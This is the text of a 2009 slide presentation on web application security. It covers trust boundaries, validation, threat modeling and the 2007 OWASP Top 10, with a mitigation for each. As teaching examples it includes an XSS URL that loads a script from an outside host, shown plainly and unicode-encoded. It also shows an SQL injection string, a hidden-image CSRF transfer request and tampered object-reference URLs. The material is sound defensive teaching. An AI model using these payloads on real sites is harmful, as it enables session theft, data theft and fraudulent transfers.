You are on page 1of 51

WEB APPLICATION SECURITY

Don Ankney
June 2009

1
DISCLAIMER
• This presentation is my own work, done on my own time, and is
not sanctioned or vetted by Microsoft.

• Blame me if it sucks. I’m sure you can find something else to


blame Microsoft for if you really want to.

2
AGENDA
• General Web Application Security Principals:
• Trust

• Data handling

• Principal of least privilege

• Defense in depth

• Challenge your assumptions

• “Think Evil”

• Threat Modeling

• OWASP Top 10

3
GENERAL PRINCIPALS
How to think about web application security

4
TRUST
• Trust no one.

• Anything that is not completely under your control should not be


trusted.

• “Trust, but verify.”

5
TRUST BOUNDARIES

User System

Application

Database

6
TRUST BOUNDARIES
• User interaction includes:

• Post, get, put, headers, cookies, ajax, etc.

• Anything that comes in across the trust boundary.

• Server interaction includes:

• Filesystem, LDAP, logs, other processes.

• Anything outside your codebase.

7
DATA HANDLING
• Bringing data across a trust boundary means both making sure you
can trust data coming in and properly encoding the data going out.

• The two primary techniques for building trust are validation and
sanitization.

• In both techniques, whitelists are preferable to blacklists.

8
WHITELISTS V. BLACKLISTS
• A whitelist is simply a list of something you do want or expect.

• A blacklist is a list of things you specifically do not want.

• Blacklists are never comprehensive – an attacker will always think


something you didn’t. This is why we whitelist.

9
DATA VALIDATION
• Data validation is the act of determine whether or not input
conforms to your expectations.

• For example, if you are expecting a US phone number, you are


expecting a ten digit number that begins with 2-9*.

• Validation doesn’t change the data – it’s a boolean conformity test.

*It’s actually more complex than this.

10
DATA SANITIZATION
• Data sanitization modifies the input so that it matches the desired
criteria.

• Following the same example, a phone number might be entered as:

(866)500-6738

• If the number is sanitized with a whitelist that requires ten digits, it


would become:

8665006738

11
PRINCIPAL OF LEAST
PRIVILEGE
• Each user should have permissions that allow them to
accomplish a given task, but no more.
• Evaluate your system and come up with role-based scenarios.
What are the common tasks? How are they grouped into user
roles?
• A user may have more than one role, but should never have
more access than they need.

12
DEFENSE IN DEPTH
• Security is like an onion …
• Always implement the strongest mitigations you can think of.
This is your front line.
• Don’t stop there – build additional layers as fall-back positions.
This is defense in depth.
• Make sure that detection is one of those layers. Design a good
logging system and catch an intruder before he makes it past the
second layer.

13
CHALLENGE YOUR
ASSUMPTIONS
• Don’t assume that the attacker is using your client software – the user
is always untrusted.

• Don’t assume that the attacker is following your page flow – the front
door may not be the only way in.

• Don’t assume that network defenses solve denial of service. Design


application-level defenses.

• If something needs to be “true” in order for the software to work,


first validate it and then enforce it.

14
“THINK EVIL”
• Bruce Schneier calls this the “Security Mindset” (blog link).

• Usability can be the enemy of security. When doing UX design, always


ask yourself how the feature can be misused.

• It’s difficult to do this systematically.

15
THREAT MODELING
• Threat modeling is systematic.

• This is a design tool.


• Start with a data flow diagram.

• Add your trust boundaries – all of them.

• Every time you cross a trust boundary, look at both of the connected components
and enumerate the threats.

• Design mitigations for each of those threats.

• That’s it – the rest is implementation. Just make sure you follow through on the
mitigations.

16
“STRIDE” FRAMEWORK
• Many threat modeling frameworks exist – Dread, Trike, CVSS, Octave, AS/NZS 4360.

• My preference is the STRIDE taxonomy:

• Spoofing

• Tampering

• Repudiation

• Information Disclosure

• Denial of Service

• Elevation of Privilege

• Stride is specifically aimed at developers, not risk managers.

17
OWASP TOP TEN
The 10 most common web application vulnerabilities

18
OWASP TOP TEN 2007
• Cross Site Scripting (XSS)

• Injection Flaws

• Malicious File Execution

• Insecure Direct Object Reference

• Cross Site Request Forgery (CSRF)

• Information Leakage and Improper Error Handling

• Broken Authentication and Session Management

• Insecure Cryptographic Storage

• Insecure Communications

• Failure to restrict URL access

19
CROSS SITE SCRIPTING
• Cross site scripting is an attack against your users. A successful attack
will allow the attacker to run arbitrary Javascript in a user’s browser.

• The trouble with XSS is that the larger the application, the more
paths data can travel through it. You have to nail all of them.

20
REFLECTED XSS
• Data from a user is accepted by a page, processed, and returned
to the user.
• This type of vulnerability is often detectable by automated tools
making it the most common.
• It’s scope is limited to the user that submits the malicious
request (often via phishing or other social engineering attacks).

21
REFLECTED XSS
• This request simply tells me hello:
http://example.com/hello.cgi?name=Don
• This isn’t as friendly:
http://example.com/hello.cgi?name=<SCRIPT
SRC=http://hackerco.de/evil.js></SCRIPT>

• This is the exact same thing (unicode):


http://example.com/hello.cgi?name=%u003c
%u0053%u0043%u0052%u0049%u0050%u0054%u0020%u0053%u0
052%u0043%u003d%u0068%u0074%u0074%u0070%u003a%u002f
%u002f%u0068%u0061%u0063%u006b
%u0065%u0072%u0063%u006f%u002e%u0064%u0065%u002f
%u0065%u0076%u0069%u006c%u002e%u006a%u0073%u003e
%u003c%u002f
%u0053%u0043%u0052%u0049%u0050%u0054%u003e
22
PERSISTENT XSS
• Persistent XSS takes exactly the same attack strings, but instead of
returning them right away, they are stored in the application and
displayed to all users who view an infected page.

• Rarer, but much more dangerous.

23
CROSS SITE SCRIPTING
• To fight XSS, you need to bring data across trust boundaries safely.

• Sanitize incoming data via a whitelist.

• Encode outgoing data properly (usually HTML encoding).

24
• A couple of gotchas:
• Attackers often encode the attack strings to bypass whitelists.

• Before checking the whitelist, make sure the input encoding matches the
application’s internal representation.

• You may need to do this several times as attackers sometimes do multiple


encodings.

• Also, internationalization makes this a lot more difficult. If your framework


provides this functionality for you, use it – don’t reinvent the wheel.

25
INJECTION FLAWS
• This is an attack against your server that can allow arbitrary
code execution.
• SQL Injection is the most infamous type of code injection attack.
• Other types of injection include LDAP, XML, HTTP, XAMP, PHP,
JSP, Python, Perl …
• Instead of tracking the individual techniques, you can think about
this as interpreter injection.

26
INTERPRETER INJECTION
• I can think of three ways that code can be injected into an interpreter:
• User input

• Dynamic includes

• Static includes across a trust boundary

• Two of these are architectural – you simply design the application to


avoid dynamic or cross-boundary includes.
• User input is brought in across a trust boundary, so it needs to be
validated or sanitized.

27
SQL INJECTION
• Consider this pseudo-code example:
Query query = “SELECT sensitiveData FROM table WHERE
table.owner = ‘“ + userNameFromGet + “’”;

query.execute();

• What happens if the username is:


‘ OR ‘1’ = ‘1

• Remember that thing about trust no one?

28
SQL INJECTION
• There’s good news about SQL injection. We know how to solve it.

• There are two layers of defense:

• Use stored procedures that exercise the principal of least privilege

• Use parameterized queries.

• Parameterized queries do the heavy lifting here.

29
PARAMETERIZED QUERIES
• Here, the structure of the query is separate from its parameters. Even
if the parameters product functional SQL statement, it is treated as
data.
Query query = “SELECT sensitiveData FROM table WHERE
table.owner=‘?1’”;
query.setParam(1, “userNameFromGet”);
query.execute();

• There is no way to bypass this. Parameterized queries are pure win.

30
MALICIOUS FILE EXECUTION
• Just like interpreter injection, this allows an attacker to execute
arbitrary code on your system, only this is not limited only to
interpreted code.

• This is primarily about upload handling, though there are other ways
of getting malicious code onto a server (SMB, attacking the update
process, etc).

31
MALICIOUS FILE EXECUTION
• Remember that the OS and filesystem are untrusted:

• Do not make system calls from within your code – use libraries to
accomplish the same thing.

• Don’t allow direct reference to the file system. Use a wrapper that
enforces access policy.

• When accepting uploads, obfuscate the file name (asymmetric


encryption).

32
INSECURE DIRECT OBJECT REFERENCE
• This is where a developer exposes an internal implementation object
to the end user – state information and method parameters become
visible.

• Exposed parameters are often things such as account numbers,


database keys, filenames, etc.

33
INSECURE DIRECT OBJECT REFERENCE
• This is a very common example:

http://example.com/photos.cgi?
gallery=1

• Here the primary key in the database is exposed as the value


“gallery.”

• You can enter an number you’d like into the URI and view the
photos in that gallery.

34
INSECURE DIRECT OBJECT REFERENCE
• Here’s another common example:

http://example.com/photos.cgi?
method=add&gallery=1

• What happens if I put another photographer’s gallery number into


the URI?

• What if the content I’m posting is illicit?

• What if I use gallery=999999999999999?

35
INSECURE DIRECT OBJECT REFERENCE
• Don’t ever directly expose your implementation in this way.

• Write a wrapper class. Remember that the user input is not trusted,
so bring it across the trust boundary safely.

• After you’ve brought it across safely, enforce your security policies –


authenticate, authorize, etc.

36
CROSS SITE REQUEST
FORGERY
• Cross Site Request Forgery (CSRF) occurs when the browser
submits a request on an attacker’s behalf.

• Consider this:
http://example.com/transfer.cgi?
dest=1&amount=1
• If the user has an active, authenticated session, the attacker can
transfer funds to any account.

37
CROSS SITE REQUEST
FORGERY
• Yes, this does require a little bit of social engineering – the attacker
has to get a user to click on a link, right?

<img src = “http://example.com/


transfer.cgi?dest=1&amount=1”
width=“1” height=“1” alt=“”>
• Most users would never notice that something happened. Would
you?

38
CROSS SITE REQUEST
FORGERY
• Solving this is easy. Submit a token with each request. If an attacker can’t predict the
token, they can’t trick the browser into submitting a request on their behalf.

• At the very least, the token needs to be unique to the user. Other common
strategies include session-unique and function-unique tokens.

• If the token is even mildly predictable, then the attacker can play the numbers. Make
it truly unpredictable – it should meet the same standards as your session token.

• If your token involves crypto, use something robust, such as SHA-2.

39
CROSS SITE REQUEST
FORGERY
<form action = “/transfer.cgi” method = “post”>
<input type=“hidden” name=“CSRFToken”
value=“GUID or something similar”>
<input type=“text” name=“dest” value=“1”>
<input type=“text” name=“amount” value =“1”>
</form>

Notice:
• POST, not GET – posting a form doesn’t leave a token in the referer header
or history.

• The token isn’t stored in the cookie – you have to use a vehicle that isn’t auto-
submitted. A header could have worked as well.

40
INFORMATION LEAKAGE
• UX folks are always after developers to give their users friendly, informative error
messages when something fails.

• Don’t listen to them.

• Friendly is good, but informative often gives attackers actionable intelligence about
how your application is written.

• This is one of the most common techniques used to discover SQL Injection vulnerabilities.

• Log detailed debug information. Display something generic.

• Make sure the generic messages are uniform – an attacker can use slight inconsistencies in the
error messages to differentiate between error states.

41
BROKEN AUTHENTICATION
& SESSION MANAGEMENT
• Identity management is difficult to write well.

• Authentication & session management considerations:

• New account establishment

• Password recovery/change

• Password requirements

• Secure credential storage

• Brute force mitigation

• Identity management middleware integration

• Sufficiently entropic session token generation

42
BROKEN AUTHENTICATION
• This is a significant engineering challenge that has already been solved
for you.

• This is one of those things that’s very easy to do almost right, but
difficult to get really right.

• Use a federated identity provider such as OpenID.

43
INSECURE CRYPTOGRAPHIC STORAGE
• Cryptography is hard. Don’t invent your own ciphers. Don’t
implement an established cipher on your own.

• Not all ciphers are created equal – make sure you’re using a strong
cipher.

• Consult someone smarter than me with crypto concerns – I’m not


qualified to advise.

44
INSECURE
COMMUNICATIONS
• This is the classic eavesdropping scenario. Remember that all data
transmitted in an unencrypted pipe is subject to interception.

• This enables other attacks:

• Man in the middle

• Session stealing

• Replay attacks

• The solution is simple – SSL

• If you can’t SSL everything, do some analysis of the flow through your application.

45
FAILURE TO RESTRICT URL
ACCESS
• Many application developers assume that because a link is not visible
to an attacker, the attacker will not be able to find it.

• Obscurity is not security – enforce your access policies in the


application.

46
FINAL THOUGHTS
• Security is a lifecycle -- it begins when you have that first idea and
doesn’t end until the product is retired.

• Ultimately, what we’re talking about is creating a culture of quality.


Knowing how to solve these problems isn’t enough. Unless every line
of code checked in represents an engineer’s best effort, problems will
slip though.

47
BIBLIOGRAPHY
• Fogie, Seth, Jeremiah Grossman, Robert Hansen, Anton Rager, and Petko D. Petkov. Xss Attacks: Cross Site
Scripting Exploits and Defense. Syngress, 2007.

• Gallagher, Tom, Lawrence Landauer, and Bryan Jeffries. Hunting Security Bugs. Microsoft Press, 2006.

• Howard, Michael, and David LeBlanc. Writing Secure Code, Second Edition. Microsoft Press, 2003.

• Howard, Michael, David LeBlanc, and John Viega. 19 Deadly Sins of Software Security (Security One-Off).
McGraw-Hill Osborne Media, 2005.

• Stuttard, Dafydd, and Marcus Pinto. The Web Application Hacker's Handbook: Discovering and Exploiting Security
Flaws. Wiley, 2007.

• Swiderski, Frank, and Window Snyder. Threat Modeling (Microsoft Professional). Microsoft Press, 2004.

48
IF YOU ONLY READ ONE
BOOK ...
• Creative Commons License
• $12.83 @ Lulu.com
• Download a .pdf for free
here.
• Also available in Spanish
and Japanese

49
I’M WEB 2.0
• Blog: http://hackerco.de

• Linkedin: http://linkedin.com/pub/don-ankney/6/213/651

• Twitter: http://twitter.com/dankney

• E-mail: dankney@hackerco.de

• Black Lodge: http://black-lodge.org

50
QUESTIONS?

51